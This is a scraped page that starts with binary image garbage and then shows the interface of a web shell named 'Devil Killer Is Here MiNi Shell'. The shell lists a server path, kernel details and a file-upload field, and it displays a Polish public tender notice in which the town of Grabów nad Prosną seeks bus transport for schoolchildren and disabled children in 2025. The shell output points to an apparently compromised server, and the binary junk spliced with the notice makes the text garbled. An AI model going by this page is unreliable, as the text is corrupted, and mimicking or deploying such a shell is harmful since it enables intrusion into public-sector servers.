JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241206/0063755801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz uczniów na zajęcia edukacyjne i wychowawcze do placówek oświatowych na terenie Miasta i Gminy Grabów nad Prosną oraz dowóz dzieci niepełnosprawnych do placówek oświatowych w podziale na 2 Części </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIASTO I GMINA GRABÓW NAD PROSNĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 250854694</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kolejowa 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Grabów nad Prosną</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-520</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@grabownadprosna.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip2.wokiss.pl/grabownp/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz uczniów na zajęcia edukacyjne i wychowawcze do placówek oświatowych na terenie Miasta i Gminy Grabów nad Prosną oraz dowóz dzieci niepełnosprawnych do placówek oświatowych w podziale na 2 Części </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-71246c4e-806c-4639-9ed8-1ed513f19394</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00637558</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00071826/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Dowóz uczniów na zajęcia edukacyjne i wychowawcze do placówek oświatowych na terenie Miasta i Gminy Grabów nad Prosną oraz dowóz dzieci niepełnosprawnych do placówek oświatowych w podziale na 2 Części</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/grabownadprosna <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/grabownadprosna</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>dotyczące korespondencji elektronicznej zostały określone w dokumentacji zamieszczonej pod adresem strony internetowej<br/>prowadzonego postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje zostały zawarte w pkt 37 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje zostały zawarte w pkt 37 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RIOŚ.271.6.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie przedmiotu zamówienia polega na przewozie uczniów na zajęcia lekcyjne ze wsi: Grabów-Wójtostwo, Grabów-Pustkowie, Smolniki, Palaty, Książenice, Kuźnica Bobrowska, Bobrowniki, Dębicze, Kopeć, Skrzynki, Zawady, Giżyce, Chlewo do Szkoły Podstawowej im. Unicef w Grabowie nad Prosną i ze Szkoły Podstawowej im. Unicef <br/>w Grabowie nad Prosną do tych wsi, przewozie uczniów na zajęcia sportowe lub kulturalne, dowozie dzieci do Publicznego Przedszkola Sióstr Salezjanek w Grabowie nad Prosną i z przedszkola do miejsca zamieszkania dziecka wraz z zapewnieniem opiekuna.<br/>Warunki realizacji przedmiotu zamówienia:<br/>1)	Usługi transportowe będą odbywały się czterema autobusami jednocześnie, których rok produkcji nie jest niższy niż 2009, do przewozu jednorazowo co najmniej 50 osób (ilość miejsc siedzących minimum 50).<br/>2)	Wszyscy uczniowie rozpoczynają zajęcia o godz. 8.00 (dowóz uczniów do godz. 8.00).<br/>3)	Na potrzeby realizacji przedmiotu umowy, Wykonawca zapewni pojazd odpowiedni do liczby przewożonych uczniów i opiekunów, wraz z kierowcą i opiekunem, zapewniając miejsca siedzące dla wszystkich przewożonych osób.<br/>4) Zamawiający wymaga zapewnienia transportu wraz z opiekunami (zatrudnienie opiekunów po stronie Wykonawcy). Wykonawca zapewnia opiekuna/opiekunów na czas trwania przewozów w ilości jeden opiekun na jeden środek transportu, kierowca nie może być jednocześnie opiekunem. Wymagania wobec opiekunów: obywatelstwo polskie, pełna zdolność do czynności prawnych oraz korzystania z pełni praw publicznych, brak skazania prawomocnym wyrokiem sądu za umyślne przestępstwo ścigane z oskarżenia publicznego lub umyślne przestępstwo skarbowe.<br/>Wykonawca zobowiązany jest opracować i wdrożyć Standardy ochrony małoletnich – do wglądu na życzenie Zamawiającego wraz z oświadczeniami opiekunów oraz kierowców o zaznajomieniu i przyjęciu do stosowania przedmiotowych Standardów ochrony małoletnich - w terminie do 30 dni od dnia wezwania do przedłożenia stosownych dokumentów. Osoby opiekujące się dziećmi podczas dowozu oraz kierowcy pojazdów, którymi dowożone są dzieci, powinni być zweryfikowani w Rejestrze Sprawców Przestępstw na Tle Seksualnym – odpowiednie zaświadczenia do wzglądu na życzenie Zamawiającego - w terminie do 30 dni od dnia wezwania do przedłożenia zaświadczenia.<br/>Obowiązki opiekunów: dbanie o bezpieczeństwo uczniów w trakcie przewozów oraz w trakcie wchodzenia i wychodzenia z pojazdu; sprawdzanie listy obecności uczniów; niezwłoczne informowanie służb medycznych oraz Zamawiającego o wszelkich sytuacjach, stwarzających zagrożenie dla uczniów. <br/>5)	W okresie od 2.01.2025r. do 27.06.2025r przyjmuje się ok. 108 dni nauki szkolnej, co stanowi 21,6 tygodnia nauki.<br/>Przyjmuje się maksymalną szacunkową ilość kilometrów dla 4 autobusów w okresie trwania całego zamówienia, tj. w okresie od 2.01.2025r. do 27.06.2025r w ilości 44.293,00 km plus ewentualną dodatkową ilość kilometrów, w ilości 150km co łącznie daje sumę 44.443,00 km.<br/>44.443,00 km : 21,6 tygodnia = 2 058km<br/>Wobec powyższego szacunkowa tygodniowa długość trasy dla 4 autobusów będzie wynosić: minimalna długość trasy 1 800km a maksymalna długość trasy 2 058km.<br/>6)	Szczegółowe wykazy tras dostarczone będą przez Zamawiającego przed dniem 02.01.2025 r. Ustalenia tras mogą być w każdym czasie zmienione przez Zamawiającego w porozumieniu z Wykonawcą. Szacunkowa ilość kilometrów w okresie trwania całego zamówienia to: 44.443,00 km.<br/>7)	Dowóz i odwóz uczniów należy zapewnić w dni nauki szkolnej przewidziane <br/>organizacją roku szkolnego, począwszy od 2 stycznia 2025 r. do 27 czerwca 2025 r. (108 usługo/dni). W przypadku zmian w organizacji roku szkolnego zamawiający zastrzega sobie prawo odwołania dowozu w danym dniu o czym powiadomi wykonawcę na 5 dni przed przewidywaną zmianą. <br/>Harmonogramy dowozów – rozkłady jazdy mogą ulec zmianie w przypadku zmian organizacyjnych pracy szkoły. <br/>8)	Przewozy dzieci odbywać się mogą wyłącznie środkami transportu spełniającymi <br/>wymagania techniczne określone w przepisach:<br/>- ustawy z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (tekst jednolity Dz. U. z 2021r. poz. 450 ze zm.) i innych przepisach związanych z przewozem osób, <br/>- ustawy z dnia 6 września 2001r. o transporcie drogowym (tekst jednolity Dz. U. z 2021r. poz. 919 ze zm.).<br/>9)	Wykonawca zobowiązany jest zapewnić bezpieczny przewóz tzn. odpowiednie warunki bezpieczeństwa i higieny. Wykonawca zapewnia opiekę nad dowozem dzieci do placówek.<br/>10)	Wykonawca ubezpiecza autobusy i pasażerów od wszelkich szkód powstałych podczas przewozu i pozostających w związku z przewozem.<br/>11)	Zamawiający nie ponosi żadnej odpowiedzialności za wypadki i zdarzenia jakiego-kolwiek typu, w wyniku których nastąpi uszkodzenie ciała, śmierć czy szkoda mate-rialna, spowodowana działalnością Wykonawcy. Wykonawca ponosi pełną odpowie-dzialność za bezpieczeństwo przewożonych uczniów i opiekunów oraz za działania kierowcy i opiekuna w czasie przewozu uczniów na zasadach określonych w Kodeksie Cywilnym.<br/>12)	Kierowcy obsługujący autobusy winni znać trasę przejazdu i przystanków a rotacja kierowców jest niewskazana. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert zawarty został w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dowóz dzieci niepełnosprawnych do Ośrodka Rewalidacyjno-Wychowawczego w Wolicy oraz do Szkoły Podstawowej Specjalnej nr 5 dla Dzieci Słabo Słyszących <br/>i Niesłyszących w Kaliszu wraz z zapewnieniem opieki <br/>Wykonanie przedmiotu zamówienia polega na przewozie dzieci niepełnosprawnych do Ośrodka Rewalidacyjno-Wychowawczego w Wolicy oraz do Szkoły Podstawowej Specjalnej nr 5 dla Dzieci Słabo Słyszących i Niesłyszących w Kaliszu wraz z zapewnieniem opieki, według następującej trasy: <br/>Dowóz: Kopeć – Bukownica – Grabów Wójtostwo – Ośrodek Rewalidacyjno -Wychowawczy w Wolicy, ul. Radosna 1 – Szkoła Podstawowa nr 5 dla Dzieci Słabo Słyszących i Niesłyszących w Kaliszu, ul. Augustyna Kordeckiego 19;<br/>Odwóz: Szkoła Podstawowa nr 5 dla Dzieci Słabo Słyszących i Niesłyszących <br/>w Kaliszu, ul. Augustyna Kordeckiego 19 - Ośrodek Rewalidacyjno - Wychowawczy <br/>w Wolicy, ul. Radosna 1 - Grabów Wójtostwo - Bukownica - Kopeć.<br/>Warunki realizacji przedmiotu zamówienia:<br/>1)	Dowóz i odwóz dzieci niepełnosprawnych należy zapewnić w dni nauki szkolnej przewidziane organizacją roku szkolnego, począwszy od 2 stycznia 2025 r. do 27 czerwca 2025 r. (108 usługo/dni).<br/>2)	W okresie od 2.01.2025 r. do 27.06.2025 r. przyjmuje się ok. 108 dni nauki szkolnej..<br/>3)	Dzienny przewidywany przebieg trasy stanowi ok. 140km <br/>4)	Liczba kilometrów na poszczególnych trasach może ulegać okresowym albo stałym zmianom m.in. w przypadku:<br/>- zgłoszenia przez rodzica nieobecności dziecka w placówce i związaną z tym możli-wością skrócenia trasy przejazdu,<br/>- zmiany organizacji ruchu na drogach dojazdu wynikających z prowadzonych prac remontowych, wypadków na drogach, itp.<br/>- zmiany przez rodzica w ciągu roku szkolnego placówki, do której dowożone jest dziecko,<br/>- konieczności zapewnienia dowożenia kolejnego dziecka niepełnosprawnego, która pojawiła się w trakcie roku szkolnego.<br/>O konieczności zmiany trasy Wykonawca poinformuje Zamawiającego najpóźniej tego dnia, w którym nastąpiła zmiana trasy. Zmiana liczby kilometrów nie powoduje zmia-ny stawki oferowanej przez Wykonawcę.<br/>5)	Liczba dzieci – 4, w tym 1 dziecko na wózku inwalidzkim.<br/>6)	Wymagany jest samochód typu BUS zarejestrowany do przewozu max. 18 osób (miejsca siedzące).<br/>7)	Pojazd musi być: przystosowany do przewozu dziecka niepełnosprawnego poruszają-cego się na wózku inwalidzkim, wyposażony w urządzenie umożliwiające wprowa-dzenie wózka inwalidzkiego do pojazdu oraz mocowanie do wózków na czas trwania przewozu. <br/>8)	Pojazd musi być wyposażony w foteliki samochodowe dostosowane do wzrostu dzieci i ich niepełnosprawności. <br/>9)	W czasie przewozu wykonawca zobowiązany jest do zapewnienia, niezależnie od kie-rowcy, stałej opieki nad dziećmi osoby dorosłej. Wykonawca zapewnia opiekuna na czas trwania przewozów. Kierowca nie może być jednocześnie opiekunem. Wymaga-nia wobec opiekuna: sprawny fizycznie, obywatelstwo polskie, pełna zdolność do czynności prawnych oraz korzystania z pełni praw publicznych, nie karany, zna pod-stawy udzielania pierwszej pomocy.<br/>Wykonawca zobowiązany jest opracować i wdrożyć Standardy ochrony małoletnich – do wglądu na życzenie Zamawiającego wraz z oświadczeniami opiekuna oraz kierowcy o zaznajomieniu i przyjęciu do stosowania przedmiotowych Standardów ochrony małoletnich - w terminie do 30 dni od dnia wezwania do przedłożenia stosownych dokumentów. Osoba opiekująca się dziećmi podczas dowozu oraz kierowca pojazdu, którymi dowożone są dzieci, powinni być zweryfikowani w Rejestrze Sprawców Przestępstw na Tle Seksualnym – odpowiednie zaświadczenia do wzglądu na życzenie Zamawiającego - w terminie do 30 dni od dnia wezwania do przedłożenia zaświadczenia.<br/>Obowiązki opiekuna: <br/>- opiekun odpowiada za bezpieczeństwo dzieci w czasie przewozu, a także w czasie <br/> przejścia z pojazdu do placówki i z placówki do pojazdu, <br/>- opiekun służy pomocą i radą uczniom niepełnosprawnym, okazuje w każdej sytuacji <br/> życzliwość uczniom niepełnosprawnym, a w sytuacjach konfliktowych, ponad <br/> wszystko ma na uwadze poszkodowanie przez los tych osób,<br/>- opiekun przebywa z dziećmi podczas jazdy i odpowiada za to, aby w czasie przewozu <br/> dzieci były zabezpieczone pasami,<br/>- opiekun odprowadza dzieci z pojazdu do szkoły i oddaje pod opiekę nauczycielowi, a <br/> po zakończonych lekcjach lub zajęciach odbiera dzieci ze szkoły i doprowadza dzieci <br/> do pojazdu,<br/>- opiekun po zajęciach lub lekcjach przekazuje dzieci rodzicom lub opiekunom <br/> prawnym lub też osobom wskazanym przez rodziców lub opiekunów prawnych, <br/>- opiekun współpracuje z Zamawiającym, zgłaszając zmiany dotyczące stanu przewozu <br/> uczniów niepełnosprawnych, czasu rozpoczęcia i zakończenia usługi itp.,<br/>- w przypadku awarii pojazdu przewożącego uczniów sprawuje opiekę nad <br/> dowożonymi uczniami, zapewniając im bezpieczeństwo do czasu zapewnienia im <br/> pojazdu zastępczego i potem w pojeździe zastępczym,<br/>- opiekun obowiązkowo posiada kontakt telefoniczny z rodzicami/opiekunami <br/> prawnymi i placówką na wypadek zmian godzin przejazdu i odjazdu wynikających z <br/> sytuacji niezależnych, np. korki, a także przekazuje ewentualne informacje ze szkoły <br/> do domu rodzinnego dziecka i odwrotnie, <br/>- opiekun zachowuje w tajemnicy dane adresowe dowożonych uczniów i nie przekaże <br/> ich osobom postronnym, <br/>- dopilnowanie zajęcia miejsc siedzących przez uczniów w pojeździe, <br/>- sprawdzenie przed rozpoczęciem jazdy zamknięcia drzwi w pojeździe, <br/>- pomoc uczniom przy wsiadaniu i wysiadaniu z pojazdu, opiekun odpowiada za <br/> bezpieczeństwo uczniów w czasie przewozu, a także w czasie wsiadania i wysiadania <br/> uczniów z pojazdu, <br/>- opiekun w przypadku awarii pojazdu niezwłocznie informuje o tym fakcie dyrektora <br/> szkoły. <br/>10)	Godziny przywozu i odwozu dzieci i młodzieży Wykonawca zobowiązany jest uzgodnić przed rozpoczęciem świadczenia usług z Zamawiającym w oparciu o rozkład zajęć <br/>w poszczególnych placówkach. W dniach, w których zajęcia odbywać się będą <br/>w sposób odmienny od przyjętego w rozkładzie zajęć (np. w dniach rekolekcji szkolnych) itp. organizacja dowozów i odwozów dzieci i młodzieży szkolnej uzgodniona zostanie z Wykonawcą przez dyrektorów placówek oświatowych <br/>i Zamawiającego. Zamawiający nie dopuszcza łączenia przez wykonawcę przewozów stanowiących przedmiot zamówienia z przewozami innych osób nie będących uczniami.<br/>11)	Wykonawca zobowiązany jest do niezwłocznego informowania Zamawiającego o problemach powstałych przy realizacji zamówienia.<br/>12)	Wykonawca otrzymywać będzie wynagrodzenie za faktycznie wykonaną trasę prze-jazdu. W dzienny przebieg kilometrów nie są wliczone dojazdy z siedziby wykonawcy do miejsca rozpoczęcia kursu oraz z miejsca zakończenia kursu do bazy. Stanowi to koszt własny wykonawcy i należy to uwzględnić w cenie za 1 wozokilometr. <br/>13)	W przypadku awarii pojazdu lub w przypadku niewykonania kursu dowozu lub odwo-zu z przyczyn leżących po stronie Wykonawcy, Wykonawca zgodnie zobowiązany jest zapewnić zastępczy środek transportu spełniający właściwe wymagania techniczne w ruchu drogowym we własnym zakresie, na własny koszt. <br/>14)	Przewozy dzieci odbywać się mogą wyłącznie środkami transportu spełniającymi wymagania techniczne określone w przepisach:<br/>- ustawy z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (tekst jednolity Dz. U. z 2021r. poz. 450 ze zm.) i innych przepisach związanych z przewozem osób, <br/>- ustawy z dnia 6 września 2001r. o transporcie drogowym (tekst jednolity Dz. U. z 2021r. poz. 919 ze zm.).<br/>15)	Wykonawca zobowiązany jest zapewnić bezpieczny przewóz tzn. odpowiednie warun-ki bezpieczeństwa i higieny. Wykonawca ubezpiecza pojazdy i pasażerów od wszel-kich szkód powstałych podczas przewozu i pozostających w związku z przewozem.<br/>16)	Zamawiający nie ponosi żadnej odpowiedzialności za wypadki i zdarzenia jakiego-kolwiek typu, w wyniku których nastąpi uszkodzenie ciała, śmierć czy szkoda mate-rialna, spowodowana działalnością Wykonawcy. Wykonawca ponosi pełną odpowie-dzialność za bezpieczeństwo przewożonych uczniów i opiekuna oraz za działania kie-rowcy i opiekuna w czasie przewozu uczniów na zasadach określonych w Kodeksie Cywilnym.<br/>17)	Kierowca obsługujący pojazd winien znać trasę przejazdu a rotacja kierowców jest niewskazana. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span 